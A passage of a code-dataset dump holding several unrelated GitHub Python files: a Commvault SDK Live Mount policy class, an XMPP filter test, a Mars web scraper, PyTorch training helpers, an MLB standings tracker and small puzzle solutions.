o_str)\n else:\n raise SDKException('Response', '102')\n 
else:\n response_str = self._commcell_object._update_response_(response.text)\n raise SDKException('Response', '101', response_str)\n\n @property\n def vm_policy_name(self):\n \"\"\"Treats the virtual machine policy name as a read-only attribute.\"\"\"\n return self._vm_policy_name\n\n @property\n def vm_policy_id(self):\n \"\"\"Treats the virtual machine policy id as a read-only attribute.\"\"\"\n return self._vm_policy_id\n\n @property\n def vm_policy_type_id(self):\n \"\"\"Treats the virtual machine policy type id as a read-only attribute.\"\"\"\n return self._vm_policy_type_id\n\n def disable(self):\n \"\"\"Disables a virtual machine policy if it is enabled.\n\n Raises:\n SDKException:\n if vm policy is already disabled\n \"\"\"\n if not self._vm_policy_properties['enabled']:\n err_msg = 'Policy is already disabled'\n raise SDKException('Virtual Machine', '102', err_msg)\n\n self._vm_policy_properties['enabled'] = False\n self._update_vm_policy()\n\n def enable(self):\n \"\"\"Enables a virtual machine policy if it is disabled.\n\n Raises:\n SDKException:\n if vm policy is already enabled\n \"\"\"\n if self._vm_policy_properties['enabled']:\n err_msg = 'Policy is already enabled'\n raise SDKException('Virtual Machine', '102', err_msg)\n\n self._vm_policy_properties['enabled'] = True\n self._update_vm_policy()\n\n def clone(self, desired_vm_policy_name):\n \"\"\"\n copies properties of the particular VM Policy and creates a new VM Policy with the\n specified name\n\n Args:\n desired_vm_policy_name (str) -- name of the policy that is going to be created\n\n Returns:\n object -- object of the Virtual Machine Policy\n\n Raises:\n SDKException:\n if type of the desired vm policy name argument is not string\n\n if a vm policy already exists by the desired vm policy name\n \"\"\"\n vm_policies_object = VirtualMachinePolicies(self._commcell_object)\n if not isinstance(desired_vm_policy_name, str):\n raise SDKException('Virtual Machine', '101')\n elif vm_policies_object.has_policy(desired_vm_policy_name):\n err_msg = 'Policy \"{0}\" already exists'.format(desired_vm_policy_name)\n raise SDKException('Virtual Machine', '102', err_msg)\n else:\n import copy\n desired_vm_policy_properties = copy.deepcopy(self._vm_policy_properties)\n desired_vm_policy_name = desired_vm_policy_name.lower()\n desired_vm_policy_properties['entity']['vmAllocPolicyName'] = desired_vm_policy_name\n del desired_vm_policy_properties['entity']['vmAllocPolicyId']\n desired_vm_policy_json = {\n 'action': 0,\n 'policy': desired_vm_policy_properties\n }\n\n return vm_policies_object._clone_vm_policy(desired_vm_policy_json)\n\n # TODO: modify(self, vm_policy_details) - Modifies the policy as per the details passed\n\n def properties(self):\n \"\"\"Returns the virtual machine properties\"\"\"\n return self._vm_policy_properties\n\n def refresh(self):\n \"\"\"Refresh the Virtual Machine policy properties.\"\"\"\n self._vm_policy_properties = self._get_vm_policy_properties()\n\n\nclass LiveMountPolicy(VirtualMachinePolicy):\n \"\"\"Derived class from VirtualMachinePolicy base class for representing a single Live Mount\n Policy. 
Contains method definitions for operations specific for Live Mount and also\n runnning Live Mount job\"\"\"\n\n def __init__(\n self,\n commcell_object,\n vm_policy_name,\n vm_policy_type_id,\n vm_policy_id=None\n ):\n \"\"\"Initialize object of the LiveMountPolicy class.\n Args:\n commcell_object (object) -- instance of the Commcell class\n vm_policy_name (str) -- name of the Live Mount policy\n vm_policy_type_id (int) -- policy type id\n vm_policy_id (int) -- id of the Live Mount policy, if available\n\n Returns:\n object -- instance of the LiveMountPolicy class\n \"\"\"\n super(LiveMountPolicy, self).__init__(commcell_object,\n vm_policy_name,\n vm_policy_type_id,\n vm_policy_id)\n self._LIVE_MOUNT_JOB_URL = self._commcell_object._services['CREATE_TASK']\n self._QOPERATION_URL = self._commcell_object._services['EXECUTE_QCOMMAND']\n self._live_mounted_vm_name = None\n\n def _prepare_live_mount_json(self, live_mount_options):\n \"\"\"Sets values for creating the add policy json\n Args:\n live_mount_options (dict) -- live mount job options provided by user\n \"\"\"\n self._set_mounted_vm_name(live_mount_options)\n self._live_mounted_vm_name = live_mount_options['vmName']\n\n _associations = LiveMountPolicy.__associations_json(live_mount_options)\n _task = LiveMountPolicy._task_json()\n _subtask = LiveMountPolicy._subtask_json()\n _one_touch_response = LiveMountPolicy._one_touch_response_json(live_mount_options)\n _vm_entity = LiveMountPolicy._vm_entity_json(live_mount_options)\n _vm_info = LiveMountPolicy._vm_info_json(live_mount_options)\n\n # TODO: only if live mount is scheduled (non default)\n\n # TODO: _pattern = live_mount_json['taskInfo']['subTasks'][0]['pattern']\n\n # TODO: backupOpts = live_mount_json['taskInfo']['subTasks'][0]['options']['backupOpts']\n live_mount_json = {\n 'taskInfo': {\n 'associations': _associations,\n 'task': _task,\n 'subTasks': [\n {\n 'subTaskOperation': 1,\n 'subTask': _subtask,\n 'options': {\n 'adminOpts': {\n 'vmProvisioningOption': {\n 'operationType': 23,\n 'virtualMachineOption': [\n {\n 'powerOnVM': True,\n 'flags': 0,\n 'useLinkedClone': False,\n 'vendor': 1,\n 'doLinkedCloneFromLocalTemplateCopy': False,\n 'vmAllocPolicy': {\n 'vmAllocPolicyName': self._vm_policy_name\n },\n 'oneTouchResponse': _one_touch_response,\n 'vmEntity': _vm_entity,\n 'vmInfo': _vm_info\n }\n ]\n }\n }\n }\n }\n ]\n }\n }\n return live_mount_json\n\n def _set_mounted_vm_name(self, live_mount_options):\n \"\"\"\n Sets the vm name for the live mounted vm\n\n Args:\n live_mount_options (dict) -- live mount job options\n\n Raises:\n SDK Exception:\n if user passes a vm name that already exists as a hidden client on the Commcell\n \"\"\"\n clients = self._commcell_object.clients\n if 'vmName' in live_mount_options:\n if live_mount_options['vmName'].lower() in clients._hidden_clients:\n err_msg = 'A client already exists by the name \"{0}\"'.format(\n live_mount_options['vmName'])\n raise SDKException('Virtual Machine', '102', err_msg)\n else:\n vm_name = live_mount_options['clientName'] + 'VM'\n digit = 1\n while vm_name.lower() in clients._hidden_clients:\n vm_name += str(digit)\n live_mount_options['vmName'] = vm_name\n\n @staticmethod\n def __associations_json(live_mount_options):\n \"\"\"\n Sets the associations value for the live mount job json\n\n Args:\n live_mount_options (dict) -- live mount job options\n\n Returns:\n _associations (list) -- list containing the associations value\n \"\"\"\n _associations = []\n _associations_element = {\n # 'type': 0,\n 
'clientName': live_mount_options['clientName'],\n # 'clientSidePackage': True,\n 'subclientName': '',\n 'backupsetName': '',\n 'instanceName': '',\n 'appName': '',\n # 'consumeLicense': True\n }\n _associations.append(_associations_element)\n return _associations\n\n @staticmethod\n def _task_json():\n \"\"\"Sets the task value for the live mount job json\n\n Returns:\n _task (dict) -- dict containing the task value\n \"\"\"\n _task = {\n 'taskType': 1,\n 'initiatedFrom': 2,\n 'alert': {\n 'alertName': ''\n },\n 'taskFlags': {\n 'disabled': False\n }\n }\n\n # TODO: if 'schedule' is there in options, change 06 07 json\n\n return _task\n\n @staticmethod\n def _subtask_json():\n \"\"\"Sets the subTask value for the live mount job json\n\n Returns:\n _subtask (dict) -- dict containing the subTask value\n \"\"\"\n _subtask = {\n 'subTaskType': 1,\n 'operationType': 4038\n }\n\n # TODO: if 'schedule' in live_mount_options: add subTaskName to json\n\n return _subtask\n\n @staticmethod\n def _one_touch_response_json(live_mount_options):\n \"\"\"Sets the oneTouchResponse value for the live mount job json\n\n Args:\n live_mount_options (dict) -- live mount job options\n\n Returns:\n _one_touch_response (dict) -- dict containing the oneTouchResponse value\n \"\"\"\n _csinfo = LiveMountPolicy._csinfo_json(live_mount_options)\n _hwconfig = LiveMountPolicy._hwconfig_json(live_mount_options)\n _netconfig = LiveMountPolicy._netconfig_json()\n _one_touch_response = {\n 'copyPrecedence': live_mount_options.get('copyPrecedence', 0),\n 'version': '',\n 'platform': 0,\n 'dateCreated': '',\n 'automationTest': False,\n 'autoReboot': True,\n 'csinfo': _csinfo,\n 'hwconfig': _hwconfig,\n 'netconfig': _netconfig,\n 'dataBrowseTime': live_mount_options.get('pointInTime', {}),\n 'maInfo': {\n 'clientName': ''\n },\n 'datastoreList': {}\n }\n\n return _one_touch_response\n\n @staticmethod\n def _csinfo_json(live_mount_options):\n \"\"\"Sets the csinfo value for the live mount job json\n\n Args:\n live_mount_options (dict) -- live mount job options\n\n Returns:\n _csinfo (dict) -- dict containing the hwconfig value\n \"\"\"\n _csinfo = {\n \"firewallPort\": 0,\n \"cvdPort\": 0,\n \"evmgrPort\": 0,\n \"fwClientGroupName\": \"\",\n \"mediaAgentInfo\": {},\n \"mediaAgentIP\": {},\n \"ip\": {},\n \"commservInfo\": {},\n \"creds\": {\n \"password\": \"\",\n \"domainName\": \"\",\n \"confirmPassword\": \"\",\n \"userName\": \"\"\n }\n }\n\n return _csinfo\n\n @staticmethod\n def _hwconfig_json(live_mount_options):\n \"\"\"Sets the hwconfig value for the live mount job json\n\n Args:\n live_mount_options (dict) -- live mount job options\n\n Returns:\n _hwconfig (dict) -- dict containing the hwconfig value\n \"\"\"\n _hwconfig = {\n 'vmName': live_mount_options['vmName'],\n 'magicno': '',\n 'bootFirmware': 0,\n 'version': '',\n 'mem_size': 0,\n 'cpu_count': 0,\n 'nic_count': 0,\n 'overwriteVm': False,\n 'useMtptSelection': False,\n 'ide_count': 0,\n 'mtpt_count': 0,\n 'scsi_count': 0,\n 'diskType': 1,\n 'optimizeStorage': False,\n 'systemDisk': {\n 'forceProvision': False,\n 'bus': 0,\n 'refcnt': 0,\n 'size': 0,\n 'name': '',\n 'dataStoreName': '',\n 'vm_disk_type': 0,\n 'slot': 0,\n 'diskType': 1,\n 'tx_type': 0\n }\n }\n\n return _hwconfig\n\n @staticmethod\n def _netconfig_json():\n \"\"\"Sets the netconfig value for the live mount job json\n\n Returns:\n _netconfig (dict) -- dict containing the netconfig value\n \"\"\"\n _netconfig = {\n 'wins': {\n 'useDhcp': False\n },\n 'firewall': {\n 'certificatePath': '',\n 
'certificateBlob': '',\n 'configBlob': ''\n },\n 'dns': {\n 'suffix': '',\n 'useDhcp': False\n },\n 'ipinfo': {\n 'defaultgw': ''\n }\n }\n\n return _netconfig\n\n @staticmethod\n def _vm_entity_json(live_mount_options):\n \"\"\"Sets the vmEntity value for the live mount job json\n Args:\n live_mount_options (dict) -- live mount job options\n\n Returns:\n _vm_entity (dict) -- dict containing the vmEntity value\n \"\"\"\n _vm_entity = {\n 'vmName': live_mount_options['vmName'],\n 'clientName': live_mount_options['clientName'],\n '_type_': 88\n }\n\n return _vm_entity\n\n @staticmethod\n def _vm_info_json(live_mount_options):\n \"\"\"Sets the vmInfo value for the live mount job json\n Args:\n live_mount_options (dict) -- live mount job options\n\n Returns:\n _vm_info (dict) -- dict containing the vmInfo value\n \"\"\"\n _vm_info = {\n 'advancedProperties': {\n 'networkCards': [\n {\n 'label': live_mount_options.get('network_name', '')\n }\n ]\n },\n 'vm': {\n 'vmName': live_mount_options['vmName'],\n '_type_': 88\n }\n }\n\n # TODO: if 'original network' is chosen as option in livemount option, verify network json\n\n return _vm_info\n\n def _is_hidden_client(self, client_name):\n \"\"\"Checks if specified client is a hidden client for the Commcell instance\n\n Args:\n client_name (str) -- name of the client\n\n Returns:\n bool -- boolean output whether the client is indeed a hidden\n client in the Commcell\n \"\"\"\n clients = self._commcell_object.clients\n return clients.has_hidden_client(client_name)\n\n def _validate_live_mount(self, client_name):\n \"\"\"Check if the specified vm has a backup for live mount\n\n Args:\n client_name (str) -- name of the vm\n client_id (int) -- client_id of the vm\n\n Raises:\n SDKException:\n if response is empty\n\n if response is not success\n\n if there is an error in the response json\n \"\"\"\n clients = self._commcell_object.clients\n client_id = clients.get(client_name.lower()).client_id\n\n validate_live_mount_xml = (\n ''\n ''\n ''\n ''\n )\n response_json = self._commcell_object._qoperation_execute(\n request_xml=validate_live_mount_xml)\n\n if response_json['error']:\n if response_json['error']['errorCode'] != 0:\n err_msg = 'Unable to validate client \"{0}\" for live mount. 
Error: {1}'.format(\n client_name, response_json['error']['errorMessage'])\n raise SDKException('Virtual Machine', '102', err_msg)\n\n def view_active_mounts(self):\n \"\"\"View active mounts for this Live Mount policy instance\n\n Returns:\n response.json()['virtualMachines'] (list) -- list of dictionary containing\n information about the vm's\n that are currently mounted\n using this ive mount policy\n\n Raises:\n SDKException:\n if no response is found\n\n if response is not a success\n \"\"\"\n active_mount_xml = (''\n ''\n ''\n '')\n\n response_json = self._commcell_object._qoperation_execute(request_xml=active_mount_xml)\n\n if 'virtualMachines' in response_json:\n return response_json['virtualMachines']\n\n def live_mount(\n self,\n client_vm_name,\n live_mount_options=None\n ):\n \"\"\"Run Live Mount for this Live Mount policy instance\n\n Args:\n client_vm_name (str) -- client vm name for which live mount is to\n be run\n live_mount_options: (dict) -- list of optional parameters for each live\n mount job.\n Allowed key-value pairs and input types\n are given below\n default : None\n 'vmName' (str) : name of the new vm that will be mounted\n 'copyPrecedence' (int) : number for the storage policy copy to use\n Default value is zero (copy with highest\n precedence is used)\n 'pointInTime' (dict) : to select live mount from point in time,\n provide a dict with following key-value pairs\n \"timeValue\" (str) : date and time in below format\n \"yyyy-mm-dd hh:mm:ss\".\n \"2018-06-18 16:09:00\", for example.\n \"TimeZoneName\" (str) : time zone value in given format\n (MS Windows time zone options).\n \"(UTC-05:00) Eastern Time (US & Canada)\"\n }\n\n\n Raises:\n SDKException:\n if the vm name passed is not string\n\n if the vm name passed does not exist\n\n if a vm is not backed up\n\n if the destination vm name (if provided) is not a string\n\n if a vm with the destination vm name already exists (if provided)\n\n Returns:\n live_mount_job (object) -- Job object for the corresponding live\n mount job\n \"\"\"\n # check if client name is string\n if not isinstance(client_vm_name, str):\n raise SDKException('Virtual Machine', '101')\n # check if client is a valid hidden client\n elif not self._is_hidden_client(client_vm_name):\n err_msg = 'Client \"{0}\" not found in Commcell'.format(client_vm_name)\n raise SDKException('Virtual Machine', '102', err_msg)\n else:\n # check if vm to be live mounted is backed up\n #self._validate_live_mount(client_vm_name)\n \n # default options if nothing is passed\n if not live_mount_options:\n live_mount_options = {}\n\n live_mount_options['clientName'] = client_vm_name\n\n live_mount_json = self._prepare_live_mount_json(live_mount_options)\n\n # making a POST call for running the Live Mount job\n flag, response = self._commcell_object._cvpysdk_object.make_request(\n 'POST', self._LIVE_MOUNT_JOB_URL, live_mount_json\n )\n\n if flag:\n if response.json():\n if 'error' in response.json():\n if response.json()['error']['errorCode'] != 0:\n error_message = response.json()['error']['errorMessage']\n o_str = 'Failed to run Live Mount\\nError: \"{0}\"'.format(error_message)\n raise SDKException('Virtual Machine', '102', o_str)\n # if no valid error in response\n if 'jobIds' in response.json():\n return Job(self._commcell_object, response.json()['jobIds'][0])\n else:\n raise SDKException('Virtual Machine', '102',\n 'Failed to run live mount')\n else:\n raise SDKException('Response', '102')\n else:\n response_string = 
self._commcell_object._update_response_(response.text)\n raise SDKException('Response', '101', response_string)\n\n @property\n def live_mounted_vm_name(self):\n \"\"\"Treats the live mounted vm name as a read-only attribute.\"\"\"\n return self._live_mounted_vm_name\n","repo_name":"Commvault/cvpysdk","sub_path":"cvpysdk/virtualmachinepolicies.py","file_name":"virtualmachinepolicies.py","file_ext":"py","file_size_in_byte":59990,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"21"} +{"seq_id":"25805872395","text":"import asyncio\nimport unittest\nfrom slixmpp.test.integration import SlixIntegration\nfrom slixmpp import Message\n\n\nclass TestSlowFilter(SlixIntegration):\n async def asyncSetUp(self):\n await super().asyncSetUp()\n self.add_client(\n self.envjid('CI_ACCOUNT1'),\n self.envstr('CI_ACCOUNT1_PASSWORD'),\n )\n self.add_client(\n self.envjid('CI_ACCOUNT2'),\n self.envstr('CI_ACCOUNT2_PASSWORD'),\n )\n await self.connect_clients()\n\n async def test_filters(self):\n \"\"\"Make sure filters work\"\"\"\n def add_a(stanza):\n if isinstance(stanza, Message):\n stanza['body'] = stanza['body'] + ' a'\n return stanza\n\n async def add_b(stanza):\n if isinstance(stanza, Message):\n stanza['body'] = stanza['body'] + ' b'\n return stanza\n\n async def add_c_wait(stanza):\n if isinstance(stanza, Message):\n await asyncio.sleep(2)\n stanza['body'] = stanza['body'] + ' c'\n return stanza\n self.clients[0].add_filter('out', add_a)\n self.clients[0].add_filter('out', add_b)\n self.clients[0].add_filter('out', add_c_wait)\n body = 'Msg body'\n msg = self.clients[0].make_message(\n mto=self.clients[1].boundjid, mbody=body,\n )\n msg.send()\n message = await self.clients[1].wait_until('message')\n self.assertEqual(message['body'], body + ' a b c')\n\n\nsuite = unittest.TestLoader().loadTestsFromTestCase(TestSlowFilter)\n","repo_name":"poezio/slixmpp","sub_path":"itests/test_slow_filters.py","file_name":"test_slow_filters.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"21"} +{"seq_id":"74921703733","text":"\n# Web Scraping Homework\n# Author: Michael Regpala\n# Create Date: 20210327\n\n#Import our Modules\nfrom splinter import Browser\nfrom bs4 import BeautifulSoup\nfrom webdriver_manager.chrome import ChromeDriverManager\nimport requests\nimport pandas as pd\nimport time \n\n#Variables\n#Site URL Variables\nsite_base = 'https://astrogeology.usgs.gov'\nmars_latest_news_url = 'https://mars.nasa.gov/news/?page=0&per_page=40&order=publish_date+desc%2Ccreated_at+desc&search=&category=19%2C165%2C184%2C204&blank_scope=Latest'\nmars_gallery_url = 'https://www.jpl.nasa.gov/images?search='\nmars_facts_url = 'https://space-facts.com/mars/'\nmars_hemisphers_url = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced'\n\n#Global Variables\nparagraph = \"\"\ntitle = \"\"\n\ndef scrape():\n #Use Beautiful Soup to scrape latest news\n html = requests.get(mars_latest_news_url)\n bs = BeautifulSoup(html.text,'html.parser')\n results = bs.find(\"div\",class_=\"slide\")\n #Following variables contain title and paragraph text from latest news article.\n paragraph = results.a.text.strip()\n title = results.find('div',class_=\"content_title\").text.strip()\n\n\n #Setup Chrome session for splinter/selenium scraping\n executable_path = {'executable_path': ChromeDriverManager().install()}\n browser = Browser('chrome', **executable_path, headless=False)\n\n #Use Splinter and 
Beautiful Soup to get image source for current featured Mars image\n browser.visit(mars_gallery_url)\n time.sleep(2)\n #Click on Mars checkbox to get featured Image\n browser.find_by_css(\"input[id=filter_Mars]\").first.click() \n time.sleep(2)\n bs = BeautifulSoup(browser.html,'html.parser')\n result = bs.find(\"div\", class_='SearchResultCard')\n large_image_html = result.a['href']\n browser.click_link_by_href(large_image_html)\n bs = BeautifulSoup(browser.html,'html.parser')\n results = bs.find(\"div\",class_= \"BaseImagePlaceholder\")\n featured_image_url = results.img['data-src']\n\n #Scrape HTML Tables Mars Stats with Pandas\n\n html = requests.get(mars_facts_url)\n df = pd.read_html(html.text)\n mars_facts_df = df[0]\n cols = [\"Stats\", \"Values\"]\n mars_facts_df.set_axis(cols,axis=\"columns\",inplace=True)\n mars_facts_df.set_index([\"Stats\",\"Values\"],inplace=True)\n #Add bootstrap classes to table HTML markup.\n mars_facts_html_table = mars_facts_df.to_html(classes=[\"table\",\"table-striped\"])\n mars_facts_html_table = mars_facts_html_table.replace('\\n', '')\n\n #Scrape Mars Hemisphere images using selenium\n browser.visit(mars_hemisphers_url)\n time.sleep(1)\n bs = BeautifulSoup(browser.html,'html.parser')\n results = bs.find_all('div', class_=\"item\")\n hemi_image_url_list = []\n for result in results:\n hemi_dict = {}\n link = result.a['href'].strip()\n title_url = result.h3.text\n browser.visit(site_base + link)\n time.sleep(1)\n bs = BeautifulSoup(browser.html,'html.parser')\n res = bs.find('img',class_='wide-image')\n img_url = site_base + res['src']\n hemi_dict = {\"title\":title_url, \"img_url\":img_url}\n hemi_image_url_list.append(hemi_dict)\n\n #Build return dictionary of required Mars facts\n final_dict = {\n \"LatestNewsTitle\": title,\n \"LatestNewsParagraph\":paragraph,\n \"FeatureImageUrl\": featured_image_url,\n \"MarsFactHtml\":mars_facts_html_table,\n \"HemispherImageUrlList\":hemi_image_url_list\n }\n browser.quit()\n\n return final_dict\n\n","repo_name":"mregpala/web-scraping-challenge","sub_path":"scrape_mars.py","file_name":"scrape_mars.py","file_ext":"py","file_size_in_byte":3496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"70210772534","text":"import os\n\ndef read_input(filename):\n day_dir = os.path.dirname(os.path.abspath(__file__))\n line = [*open(os.path.join(day_dir, filename), 'r')][0].strip()\n horz, vert = None, None\n for w in line.split():\n if w.startswith('x='):\n horz = tuple(map(int, w[2:-1].split('..')))\n elif w.startswith('y='):\n vert = tuple(map(int, w[2:].split('..')))\n return horz, vert\n","repo_name":"m-tkach/adventofcode","sub_path":"2021/17/iparser.py","file_name":"iparser.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"7078286077","text":"'''\nAuthor: liubai\nDate: 2021-03-08\nLastEditTime: 2021-03-08\n'''\n\n\nimport torch\nimport torchvision\n\n# load_data_fashion_mnist()\nimport torchvision.transforms as transforms \n\nimport matplotlib.pyplot as plt\nfrom IPython import display\nimport time\nimport sys\nsys.path.append(\"..\") # so that d2lzh_pytorch in the parent directory can be imported\n\n# Load the fashionMNIST data\ndef load_data_fashion_mnist(batch_size): \n # fashionMNIST\n mnist_train = torchvision.datasets.FashionMNIST(\n root='../', \n train=True, download=True, \n transform=transforms.ToTensor())\n\n mnist_test = torchvision.datasets.FashionMNIST(\n root='../', \n train=False, 
download=True, \n transform=transforms.ToTensor())\n \n # take batch_size samples at a time\n # fetch the sample data with multiple worker processes \n if sys.platform.startswith('win'):\n # number of worker processes\n num_workers=0\n else:\n num_workers=4\n \n # randomly select batch_size data samples\n train_iter=torch.utils.data.DataLoader(mnist_train,\n batch_size=batch_size,\n shuffle=True,num_workers=num_workers)\n test_iter=torch.utils.data.DataLoader(mnist_test,\n batch_size=batch_size,shuffle=False,num_workers=num_workers)\n \n return train_iter,test_iter\n\n\n# Define a function that converts numeric class labels to text labels\ndef get_fashion_mnist_labels(labels):\n text_labels = ['t-shirt', 'trouser', 'pullover', 'dress', 'coat','sandal', 'shirt', 'sneaker', 'bag', 'ankle boot']\n return [text_labels[int(i)] for i in labels]\n\n\n# Define a function that draws several images and their labels in a single row\ndef show_fashion_mnist(images, labels):\n # d2l.use_svg_display() is replaced by display.set_matplotlib_formats('svg')\n # load a batch of images and display them in SVG format\n display.set_matplotlib_formats('svg')\n \n # plt.subplots() returns (figure, axes)\n # equivalent to fig = plt.figure(); fig.add_subplot(111)\n # the _ here is a variable we ignore (do not use)\n # split the figure into 1*len(images) subplots\n _, figs = plt.subplots(1, len(images), figsize=(12, 12))\n # for xx in zip(yy) iterates the sequences in parallel\n for f, img, lbl in zip(figs, images, labels):\n f.imshow(img.view((28, 28)).numpy())\n f.set_title(lbl)\n f.axes.get_xaxis().set_visible(False)\n f.axes.get_yaxis().set_visible(False)\n plt.show()\n\n\"\"\"\nBefore section 3.13\n# Evaluate the accuracy of model net on the mini-batches from data_iter\ndef evaluate_accuracy(data_iter,net):\n acc_sum,n=0.0,0\n for X,y in data_iter:\n acc_sum+=(net(X).argmax(dim=1) == y).float().sum().item()\n n+=y.shape[0]\n return acc_sum/n\n\"\"\"\n# Dropout is added to the model and used only during training; it must be turned off during evaluation\ndef evaluate_accuracy(data_iter,net):\n acc_sum,n=0.0,0\n for X,y in data_iter:\n if isinstance(net,torch.nn.Module):\n # evaluation mode, which turns off dropout\n net.eval()\n acc_sum+=(net(X).argmax(dim=1) == y).float().sum().item()\n # switch back to training mode\n net.train()\n else:\n # a custom (self-defined) model\n if('is_training' in net.__code__.co_varnames):\n # if it has an is_training parameter\n acc_sum+=(net(X,is_training=False).argmax(dim=1) == y).float().sum().item()\n n+=y.shape[0]\n return acc_sum/n\n\n\n\n# Backpropagate and update the parameters in params\ndef sgd(params, lr, batch_size):\n # To stay consistent with the original book we divide by batch_size here,\n # but the division should not be necessary, because a loss computed with\n # PyTorch is usually already averaged over the batch dimension.\n for param in params:\n param.data -= lr * param.grad / batch_size \n # note that param.data is used when modifying param here\n\n# Define a function to train the model\ndef train_ch03(net,train_iter,test_iter,loss,batch_size,num_epochs,params=None,lr=None,optimizer=None):\n for epoch in range(num_epochs):\n train_loss_sum,train_acc_sum,n=0.0,0.0,0\n for X,y in train_iter:\n # predicted values\n y_hat=net(X)\n # compute the loss\n l=loss(y_hat,y).sum()\n\n # zero the gradients before backpropagating\n if optimizer is not None:\n optimizer.zero_grad()\n elif params is not None and params[0].grad is not None:\n for param in params:\n param.grad.data.zero_()\n \n # backpropagate the gradients\n l.backward()\n\n if optimizer is None:\n # update the parameters\n sgd(params,lr,batch_size)\n else:\n optimizer.step()\n \n # accumulate the loss\n # accumulate the number of correct predictions\n # accumulate the number of samples\n train_loss_sum+=l.item()\n train_acc_sum+=(y_hat.argmax(dim=1) == y ).sum().item()\n n+=y.shape[0]\n # at the end of each epoch, compute the accuracy on the test set\n test_acc=evaluate_accuracy(test_iter,net)\n print('epoch %d, loss %.4f, train acc %.3f,test acc %.3f'\n %(epoch+1,train_loss_sum/n,train_acc_sum/n,test_acc))\n\n# Define a flatten layer\nclass FlattenLayer(torch.nn.Module):\n def __init__(self):\n super(FlattenLayer, self).__init__()\n def forward(self, x): # x shape: (batch, *, *, ...)\n return x.view(x.shape[0], -1)\n\n
\n","repo_name":"chgex/DIDL","sub_path":"0_DLNote/ch03-base/d2l_pytorch.py","file_name":"d2l_pytorch.py","file_ext":"py","file_size_in_byte":5327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72557530292","text":"from mlbgame import mlbgame\nfrom datetime import datetime\n\nclass Team:\n def __init__(self, full_name, abbreviation, location, wins, losses, record,\n division, standing, todays_game_text, todays_game_score):\n self.full_name = full_name\n self.abbreviation = abbreviation\n self.location = location\n self.wins = wins\n self.losses = losses\n self.record = record\n self.division = division\n self.standing = standing\n self.todays_game_text = todays_game_text\n self.todays_game_score = todays_game_score\n\nclass TeamMapper:\n def __init__(self, divisions, todays_games, abbreviation=None, full_name=None, location=None):\n self.divisions = divisions\n self.todays_games = todays_games\n self.abbreviation = abbreviation\n self.full_name = full_name\n self.location = location\n self.mlb_team = None\n\n def log_team_not_found_error(self):\n errors = \"\"\n if self.abbreviation:\n errors += self.abbreviation\n if self.location:\n errors += \"/ {}\".format(self.location)\n if self.full_name:\n errors += \"/ {}\".format(self.full_name)\n print('No team found for {}'.format(errors))\n\n\n def list_all_team_abbrevs(self):\n abbrevs = []\n for division in self.divisions:\n for team in division.teams:\n abbrevs.append(team.team_abbrev)\n return abbrevs\n\n def populate(self):\n self.find_team()\n if self.mlb_team:\n self.populate_team()\n\n\n def find_team(self):\n for division in self.divisions:\n for team in division.teams:\n if self.abbreviation and self.abbreviation == team.team_abbrev:\n self.mlb_team = team\n self.populate_team()\n elif self.full_name and self.full in team.team_full:\n self.mlb_team = team\n self.populate_team()\n elif self.location and self.location in team.team_full:\n self.mlb_team = team\n self.populate_team()\n elif self.location and self.location in team.team_short:\n self.mlb_team = team\n self.populate_team()\n else:\n continue\n\n\n def find_team_by_name(self, name):\n for division in self.divisions:\n for team in division.teams:\n if name in team.team_full:\n return team\n return None\n\n\n def convert_division_to_short_name(self):\n return (self.mlb_team.division.replace('National League', 'NL')\n .replace('American League', 'AL'))\n\n\n def correct_for_dbacks(self, game_team_name):\n \"\"\"\n Arizona Diamondbacks in mlbgame.standings().divisions[...].team_short\n does not match D-backs in GameScoreboards.\n see\n \"\"\"\n if game_team_name == 'D-backs':\n return 'Diamondbacks'\n return game_team_name\n\n\n def find_todays_game_text(self):\n game_text = \"Off-Day\"\n for game in self.todays_games:\n # GameScoreboard\n if game.home_team in self.mlb_team.team_full:\n real_team_name = self.correct_for_dbacks(game.away_team)\n other_team = self.find_team_by_name(name=real_team_name)\n game_text = self.format_home_team(away_team=other_team.team_abbrev)\n if game.away_team in self.mlb_team.team_full:\n real_team_name = self.correct_for_dbacks(game.home_team)\n other_team = self.find_team_by_name(name=real_team_name)\n game_text = self.format_away_team(home_team=other_team.team_abbrev)\n return game_text\n\n\n def find_todays_game_score(self, home_team_name=None, away_team_name=None):\n score = None\n for game in self.todays_games:\n if game.home_team in home_team_name and game.game_status == 
'FINAL':\n score = self.format_score(game)\n if game.away_team in away_team_name and game.game_status == 'FINAL':\n score = self.format_score(game)\n return score\n\n\n def format_score(self, game):\n return \"{}-{}\".format(game.away_team_runs, game.home_team_runs)\n\n\n def format_home_team(self, away_team):\n return \"{}@{}\".format(away_team, self.mlb_team.team_abbrev)\n\n\n def format_away_team(self, home_team):\n return \"{}@{}\".format(self.mlb_team.team_abbrev, home_team)\n\n\n def populate_team(self):\n self.team = Team(full_name=self.mlb_team.team_full,\n abbreviation=self.mlb_team.team_abbrev,\n location=self.mlb_team.team_short,\n wins=self.mlb_team.w,\n losses=self.mlb_team.l,\n record=\"{}W-{}L\".format(self.mlb_team.w, self.mlb_team.l),\n division=self.convert_division_to_short_name(),\n standing=self.mlb_team.place,\n todays_game_text=self.find_todays_game_text(),\n todays_game_score=self.find_todays_game_score(home_team_name=self.mlb_team.team_full, away_team_name=self.mlb_team.team_full))\n","repo_name":"coopernetes/mlb-slack-tracker","sub_path":"baseball/team.py","file_name":"team.py","file_ext":"py","file_size_in_byte":5308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15400823283","text":"import math\n\ndef get_int():\n\treturn int(input())\n\ndef get_ints():\n\treturn [int(i) for i in input().split()]\n\nn = get_int()\na = get_ints()\n\ns = set()\nsumme = 0\ncount = 0\nfor e in a:\n\tsumme += e\n\n\tif summe in s or summe == 0:\n\t\tcount += 1\n\t\ts = set()\n\t\ts.add(e)\n\t\tsumme = 